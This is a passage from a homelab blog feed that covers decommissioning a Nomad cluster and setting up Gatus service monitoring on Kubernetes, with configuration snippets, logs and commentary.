</span></span><span style="display:flex;"><span>          &#34;--web.console.templates<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">share</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">prometheus</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">consoles</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--web.page-title<span style="color:#f92672">=</span><span style="color:#66d9ef">Homenet</span> <span style="color:#66d9ef">Prometheus</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--storage.tsdb.retention.time<span style="color:#f92672">=</span><span style="color:#ae81ff">5</span><span style="color:#960050;background-color:#1e0010">y&#34;</span>,
</span></span><span style="display:flex;"><span>          &#34;--log.format<span style="color:#f92672">=</span><span style="color:#66d9ef">json</span><span style="color:#960050;background-color:#1e0010">&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;prometheus&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">volume_mount</span> {
</span></span><span style="display:flex;"><span>        volume      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-prometheus&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/prometheus&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;prometheus/templates/prometheus.yml.templ&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./secrets/prometheus.yml&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This shows a pretty typical Nomad job setup in my Homelab. One of the interesting
things compared to Kubernetes is that most of the configuration lives in a single
file instead of a bunch of YAML files. Very roughly speaking, the <code>group</code> is
the equivalent of a Kubernetes Pod, in that it provides a common networking and
filesystem/volume namespace, and all <code>tasks</code> in a group get scheduled on
the same node.</p>
<p>The tight integrations with Vault and Consul are both visible
here. First, there&rsquo;s the <code>service</code> stanza, which hooks Prometheus into Consul&rsquo;s Connect
mesh for service discovery. How that looks from the consumer side can be seen
in the <code>connect</code> stanza, which sets up an upstream for an SNMP exporter running in
a separate job. Then there&rsquo;s the <code>vault</code> stanza, which configures the policy used for
any Vault secrets access from the job. These policies can then be tuned to allow
access only to the secrets the specific job actually needs.</p>
<p>Something else I learned to appreciate was the <code>template</code> stanza. It internally
uses <a href="https://github.com/hashicorp/consul-template">consul-template</a> to template
configuration files, complete with Vault integration. This made running apps
which expect their secrets in their configuration files a lot more convenient.</p>
<p>But I don&rsquo;t want to go into too much detail here. I&rsquo;m planning to write a
series of Homelab history posts where I will go into a lot more detail on the
setup and dredge up all manner of old configurations and notes.</p>
<p>In the end, the trigger for my decision to migrate my well-functioning Homelab
to k8s was HashiCorp&rsquo;s decision to relicense under a more restrictive license.
But I could have survived that one as well. And then they went and changed the
ToS for the Terraform provider registry to exclude the FOSS fork of Terraform.
That looked very much like pure spite to me, and I no longer trusted HashiCorp
enough to build my Homelab on their tools. More details can be found in
<a href="https://blog.mei-home.net/posts/hashipocalypse/">this post</a>.</p>
<p>So even though I liked (and still like) the tools, I&rsquo;ve now moved away from them
for the most part. Here is a screenshot of the cluster when it was in full swing:</p>
<figure>
    <img loading="lazy" src="nomad-full.png"
         alt="A screenshot of Nomads topology Web UI. It shows that the cluster had 9 clients, running 56 allocations. It had 68.66 GiB of RAM, of which 41% was reserved by jobs. The cluster also had 58.24 GHz of compute, of which 59% was used. To the right, a list shows the nine hosts, running anywhere between 2 and 10 allocations. Most of the hosts are Raspberry Pi CM4, with 8 GiB of RAM and 6000 MHz of compute."/> <figcaption>
            <p>The Nomad cluster when it was in full use.</p>
        </figcaption>
</figure>

<p>And then, on March 13th, it looked like this:</p>
<figure>
    <img loading="lazy" src="empty-nomad.png"
         alt="A screenshot of Nomads topology Web UI. It shows the same cluster, but now with only five instead of nine clients. The list of allocations assigned to hosts now only shows &#39;Empty client&#39; for the remaining clients."/> <figcaption>
            <p>The Nomad cluster right before shutdown.</p>
        </figcaption>
</figure>

<p>At that point, a couple of hosts were already migrated over to the k8s cluster.</p>
<p>It all ended with this:</p>
<pre tabindex="0"><code>Mar 13 20:42:52 nomad[657]: ==&gt; Caught signal: interrupt
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.837+0100 [INFO]  agent: requesting shutdown
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.837+0100 [INFO]  nomad: shutting down server
Mar 13 20:42:52 systemd[1]: Stopping Nomad...
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.837+0100 [WARN]  nomad: serf: Shutdown without a Leave
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.861+0100 [ERROR] consul.sync: failed deregistering agent service: service_id=_nomad-server-znuisv3m75ywtkofhwsukx47zklaefe3 error=&#34;Unexpected response code: 403 (Permission denied: token with AccessorID &#39;eaab766d-7627-3cda-21fe-a3d5fb63dd7a&#39; lacks permission &#39;service:write&#39; on \&#34;nomad\&#34;)&#34;
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.863+0100 [ERROR] consul.sync: failed deregistering agent service: service_id=_nomad-server-fi2peeufsfjc6po3r6v3vrhwg2pcyymo error=&#34;Unexpected response code: 403 (Permission denied: token with AccessorID &#39;eaab766d-7627-3cda-21fe-a3d5fb63dd7a&#39; lacks permission &#39;service:write&#39; on \&#34;nomad\&#34;)&#34;
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.866+0100 [ERROR] consul.sync: failed deregistering agent service: service_id=_nomad-server-ppg65djoq2gktz3gnzojkqza4d4idkv4 error=&#34;Unexpected response code: 403 (Permission denied: token with AccessorID &#39;eaab766d-7627-3cda-21fe-a3d5fb63dd7a&#39; lacks permission &#39;service:write&#39; on \&#34;nomad\&#34;)&#34;
Mar 13 20:42:52 nomad[657]:     2025-03-13T20:42:52.869+0100 [INFO]  agent: shutdown complete
Mar 13 20:42:52 systemd[1]: nomad.service: Main process exited, code=exited, status=1/FAILURE
Mar 13 20:42:52 systemd[1]: nomad.service: Failed with result &#39;exit-code&#39;.
Mar 13 20:42:52 systemd[1]: Stopped Nomad.
Mar 13 20:42:52 systemd[1]: nomad.service: Consumed 16h 25min 36.860s CPU time.
</code></pre><p>And with that it&rsquo;s gone. &#x1f641;</p>
<p>You will note the errors complaining about Consul. I had removed the Consul
tokens that allowed Nomad to manage its own service registrations before
remembering that those registrations still existed. This was fixable by
deregistering the Nomad service manually:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>consul services deregister -id<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;_nomad-server-zytfvzuzuboej3ehgwdihrgykyfj46pp
</span></span></span></code></pre></div><p>This command needs to be run against the Consul agent where the service was
registered; it can&rsquo;t be executed against just any Consul agent.</p>
<p>And with that, Nomad is gone. There&rsquo;s still a lot to do. I&rsquo;m already done shutting
down my Ceph cluster as well; that will likely be the next post.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 21: Replacing Uptime Kuma with Gatus</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-21-gatus/</link>
      <pubDate>Wed, 12 Mar 2025 22:40:24 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-21-gatus/</guid>
      <description>Replacing Uptime Kuma on Nomad with Gatus on k8s</description>
      <content:encoded><![CDATA[<p>Wherein I replace Uptime Kuma on Nomad with Gatus on Kubernetes.</p>
<p>This is part 22 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>For my service monitoring needs, I&rsquo;ve been using <a href="https://github.com/louislam/uptime-kuma">Uptime Kuma</a>
for a couple of years now. Please have a look at the repo&rsquo;s Readme for a couple
of screenshots; I completely forgot to take some before taking my instance down. &#x1f926;
My main use for it was as a platform to monitor the
services, not so much as a dashboard. To that end, I gathered Uptime Kuma&rsquo;s data
from the integrated Prometheus exporter and displayed it on my Grafana Homelab
dashboard.</p>
<p>I had two methods for monitoring services. The main one was checking their
domains via <a href="https://developer.hashicorp.com/consul/docs/services/discovery/dns-overview">Consul&rsquo;s DNS</a>.
Because all my services&rsquo; health checks in the Nomad/Consul setup were done by
Consul anyway, this was a pretty nice method. When a service failed its health
check, Consul would remove it from its DNS and the Uptime Kuma check would start
failing.</p>
<p>But this approach wasn&rsquo;t really enough - for example, Mastodon&rsquo;s service might
very well be up and healthy, but I might have screwed up the Traefik configuration,
meaning my dashboards were green, but Mastodon would still be unreachable. So
I slowly switched to HTTP and raw TCP socket checks to make sure that the
services were actually reachable, and not just healthy.</p>
<p>There were always two things I didn&rsquo;t like about Uptime Kuma. First, it
requires some storage, because it stores its data in an SQLite database. Second,
the configuration can only be done via the web UI and is then stored in the
database. So no versioning of the config. And I&rsquo;ve become very fond of having
my Homelab configs under version control over the years.</p>
<p>So when it came to planning the k8s migration, I looked around and was pointed
to <a href="https://github.com/TwiN/gatus">Gatus</a>, I think by <a href="https://www.youtube.com/watch?v=LeZQjWlDUHs">this video</a> video from <a href="https://www.youtube.com/@TechnoTim">Techno Tim</a>
on YouTube. It has two advantages over Uptime Kuma, namely that it does not
need any storage and that it is entirely configured via a YAML file. Of course,
the fact that it can run without storage also means that after a restart, the
history is gone. But this is fine for me, because I don&rsquo;t need a history, as
I&rsquo;m sending the data to Prometheus anyway. This is not to say that Gatus
doesn&rsquo;t support persistence. It can be run with a PostgreSQL or SQLite database.
But I don&rsquo;t need any persistence in my setup.</p>
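<p>For reference, going by the Gatus docs, persistent storage would look roughly like
this, should I ever change my mind (the path here is just a placeholder):</p>
<pre tabindex="0"><code>storage:
  type: sqlite
  path: /data/data.db
</code></pre>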
<h2 id="setup">Setup</h2>
<p>As Gatus doesn&rsquo;t have any dependencies, I can get right into the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/gatus-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sysctls</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.ipv4.ping_group_range</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">value</span>: <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">65536</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">twinproduction/gatus:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#ae81ff">CAP_NET_RAW</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">250m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">GATUS_LOG_LEVEL</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;DEBUG&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/health&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gatus-conf</span>
</span></span></code></pre></div><p>There&rsquo;s not much interesting to say about the Deployment; it&rsquo;s pretty much
the standard Deployment in my Homelab, with one exception: the <code>CAP_NET_RAW</code>
capability I&rsquo;m adding to the container, and the <code>sysctls</code> setting:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sysctls</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.ipv4.ping_group_range</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">value</span>: <span style="color:#ae81ff">0</span> <span style="color:#ae81ff">65536</span>
</span></span><span style="display:flex;"><span>[<span style="color:#ae81ff">...]</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#ae81ff">CAP_NET_RAW</span>
</span></span></code></pre></div><p>These are needed because I use pings to determine whether a host is up or not.
When initially running without these settings, I got the following:</p>
<pre tabindex="0"><code>2025/03/08 16:09:38 [watchdog.execute] Monitored group=Hosts; endpoint=Host: Foobar; key=hosts_host:-Foobar; success=false; errors=0; duration=0s; body=
</code></pre><p>Not too helpful, but it indicated that the host <code>foobar</code> was not returning the
pings. But I knew the host was up, and I knew I was able to ping it from the
host running the Gatus pod. After some searching, I found <a href="https://github.com/TwiN/gatus/issues/697">this issue</a>,
and the explanation that running <code>ping</code> requires some privileges. On a normal
system this is handled by setting the setuid bit on the <code>ping</code> executable, which is
owned by <code>root</code>. But here, the ping is executed through a Go library, not by running
the <code>ping</code> executable. And because the container doesn&rsquo;t run as root, the Gatus
process simply doesn&rsquo;t have enough privileges to ping anything.
On a lower level, <code>ping</code> uses raw network sockets, which are privileged in the
Linux kernel.
The <code>sysctls</code> setting was proposed as a solution in the issue I linked above,
but setting it alone did not work for me. I also had to add the <code>CAP_NET_RAW</code>
capability. Still better than running the container in fully privileged mode.</p>
<h2 id="configuration">Configuration</h2>
<p>Gatus is configured via a YAML file. The common part of my config
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">metrics</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">memory</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ui</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">title</span>: <span style="color:#e6db74">&#34;Meiers Homelab&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">description</span>: <span style="color:#e6db74">&#34;Monitoring for Meiers Homelab&#34;</span>
</span></span></code></pre></div><p>Again, nothing really noteworthy: this enables the <code>memory</code> storage type and the
metrics endpoint, which exposes Prometheus metrics for every endpoint at <code>/metrics</code>.</p>
<p>Then come the endpoints, which is Gatus&rsquo; name for &ldquo;things to monitor&rdquo;.
I will show a couple of examples for the different things I monitor, starting
with the host monitoring via ping:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Host: Foobar&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Hosts&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;icmp://foobar.home&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">5m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[CONNECTED] == true&#34;</span>
</span></span></code></pre></div><p>This config sends a ping to <code>foobar.home</code> every five minutes and registers the
check as successful if it receives a reply.
It also puts the check into the <code>Hosts</code> group. Here Gatus is a bit less
flexible than Uptime Kuma, which allowed creating individual dashboards.</p>
<p>Next, I&rsquo;m using TCP socket connections to check whether my Ceph MON daemons
are up, at least insofar as they accept connections:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Ceph: Mon Baz&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;tcp://baz.home:6789&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">2m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[CONNECTED] == true&#34;</span>
</span></span></code></pre></div><p>This check tries to establish a TCP connection to the host:port given in the URL.
I also wanted to configure a check on the overall health of the Ceph cluster.
Ceph&rsquo;s MGR/dashboard module supplies one at <a href="https://docs.ceph.com/en/reef/mgr/ceph_api/#health">/api/health</a>,
several of them with different levels of detail, even. And Gatus itself allows you
to check a lot of different things in the body of the response received by an
HTTP check. But the issue here was that Gatus doesn&rsquo;t support simple basic auth
for monitored endpoints, and Ceph itself only allows authenticated access to the
HTTP API, including the health endpoint.</p>
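<p>Just to illustrate what I had in mind: Gatus conditions can also reach into a JSON
response body, so an unauthenticated health endpoint could in principle have been
checked with something like this (the URL and the JSON path are purely illustrative):</p>
<pre tabindex="0"><code>- name: &#34;Ceph: Health&#34;
  group: &#34;Ceph&#34;
  url: &#34;https://ceph.example.com:8443/api/health/minimal&#34;
  interval: 5m
  conditions:
    - &#34;[STATUS] == 200&#34;
    - &#34;[BODY].health.status == HEALTH_OK&#34;
</code></pre>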
<p>As a short aside, I&rsquo;m still a bit torn on authenticated health endpoints. I think
that they should definitely be an option - if you&rsquo;ve got auth infrastructure for
everything anyway, there&rsquo;s not much cost for setting your monitoring up with a
valid token. But in a Homelab, it gets really annoying really fast. On the other
hand, any unauthenticated endpoint is a potential entryway into your app. So I
understand putting that behind auth. But I would like it to be optional, please.
Give me an option to say &ldquo;Yes, authenticate everything - besides the health API&rdquo;.
Sure, I could set up OAuth2 for the Ceph API and then configure Gatus to use it,
but that seems just a bit too much hassle, considering that I&rsquo;m already getting
the health status via Prometheus scraping anyway.</p>
<p>Okay, the next example is an HTTP check on my Consul server:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Cluster: Consul&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Cluster&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;https://consul.example.com:8501/v1/status/leader&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;GET&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">2m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[STATUS] == 200&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">client</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">insecure</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>The <code>insecure: true</code> option is required here, because the Consul server uses my
internal CA, and providing the CA certs to Gatus was just a bit too much hassle,
especially for a service I will be taking down soon anyway.</p>
<p>Next up, checking whether my internal authoritative DNS server is working:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Infra: DNS Bar&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Infra&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;bar.home:53&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">2m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dns</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">query-name</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">query-type</span>: <span style="color:#e6db74">&#34;A&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[BODY] == 300.300.300.1&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[DNS_RCODE] == NOERROR&#34;</span>
</span></span></code></pre></div><p>This check makes a DNS request for <code>ingress.example.com</code> to <code>bar.home</code> and then
checks that the response is the correct IP, and that there was no error.
I&rsquo;m using the IP of my ingress for this check because it doesn&rsquo;t change, and
the ingress is probably the most stable component in my setup.</p>
<p>Last but not least, here is the config for checking how long a cert is going
to be valid:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Infra: mei-home.net cert&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">group</span>: <span style="color:#e6db74">&#34;Infra&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">url</span>: <span style="color:#e6db74">&#34;https://blog.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">12h</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">conditions</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;[CERTIFICATE_EXPIRATION] &gt; 72h&#34;</span>
</span></span></code></pre></div><p>This one uses my blog to check whether my cert for mei-home.net is still valid
for at least three days.</p>
<p>And this is what the web UI looks like:
<figure>
    <img loading="lazy" src="gatus-groups.png"
         alt="A screenshot of Gatus main dashboard. It&#39;s headed &#39;Health Status&#39; and shows several groups as collapsed lists. Each group has a name, in this case &#39;Ceph&#39;, &#39;Cluster&#39;, &#39;Hosts&#39;, &#39;Infra&#39;, &#39;K8s&#39; and &#39;Services&#39;. To the right of the name of each group is a green check mark indicating the groups current status, which turns into a red X if any of the checks in that group fails."/> <figcaption>
            <p>Gatus dashboard with all groups collapsed.</p>
        </figcaption>
</figure>

Each individual check is then shown like this when the group is expanded:
<figure>
    <img loading="lazy" src="gatus-service.png"
         alt="A screenshot of an expanded check in Gatus&#39; dashboard. It shows the name of the check at the top and then a row of green check marks below that, one for each recent execution of the check. To the right, it also shows the average duration of the check, 41 ms in this case for the blog.mei-home.net check. To the very left and very right, the execution time of the oldest and newest check is shown, respectively."/> <figcaption>
            <p>Expanded service in Gatus&rsquo; web UI.</p>
        </figcaption>
</figure>
</p>
<p>I don&rsquo;t foresee visiting this page too often, as I will mostly get the information
from the Grafana dashboard I will describe in the next section.</p>
<h2 id="metrics-and-grafana">Metrics and Grafana</h2>
<p>Gatus provides metrics in Prometheus format at the <code>/metrics</code> endpoint:</p>
<pre tabindex="0"><code># HELP gatus_results_certificate_expiration_seconds Number of seconds until the certificate expires
# TYPE gatus_results_certificate_expiration_seconds gauge
